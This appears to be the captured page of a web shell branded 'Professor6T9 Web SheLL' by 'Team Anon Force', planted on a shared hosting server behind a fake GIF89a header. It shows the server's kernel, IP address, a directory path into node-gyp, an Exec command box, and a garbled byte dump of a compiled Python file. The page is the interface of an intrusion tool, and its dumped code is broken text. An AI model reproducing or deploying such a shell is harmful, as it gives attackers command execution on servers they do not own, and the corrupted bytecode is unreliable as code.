GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
alt-nodejs22
/
root
/
lib
/
node_modules
/
npm
/
node_modules
/
node-gyp
/
gyp
/
pylib
/
gyp
/
__pycache__
[ HOME ]
Exec
Submit
MSVSNew.cpython-38.pyc
U �=�h�2 � @ s� d Z ddlZddlZddlZddlmZ ddlZdd� Ze� � ddd�Z dd d�ZG dd � d �ZG dd� de�Z G dd� de�ZG dd� d�ZdS )z7New implementation of Visual Studio project generation.� N)� attrgetterc C s | |k| |k S �N� )�x�yr r �j/opt/alt/alt-nodejs22/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/pylib/gyp/MSVSNew.py�cmp s r z&{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}z&{2150E333-8FDC-42A3-9474-1A3956D46DE8})�project�folder�msvs_newc C s| t �t|�t| � �d���� �� }d|dd� d |dd� d |dd� d |dd� d |dd � d }|S )a# Returns a GUID for the specified target name. Args: name: Target name. seed: Seed for MD5 hash. Returns: A GUID-line string calculated from the name and seed. This generates something which looks like a GUID, but depends only on the name and seed. This means the same name/seed will always generate the same GUID, so that projects and solutions which refer to each other can explicitly determine the GUID to refer to explicitly. It also means that the GUID will not change when the project for a target is rebuilt. zutf-8�{N� �-� � � � �})�hashlibZmd5�str�encodeZ hexdigest�upper)�name�seed�d�guidr r r �MakeGuid s0 $ �� �� �� �� � �� r c @ s e Zd Zdd� ZdS )�MSVSSolutionEntryc C s t | j| �� f|j|�� f�S r )r r �get_guid)�self�otherr r r �__cmp__F s zMSVSSolutionEntry.__cmp__N)�__name__� __module__�__qualname__r! r r r r r E s r c @ s"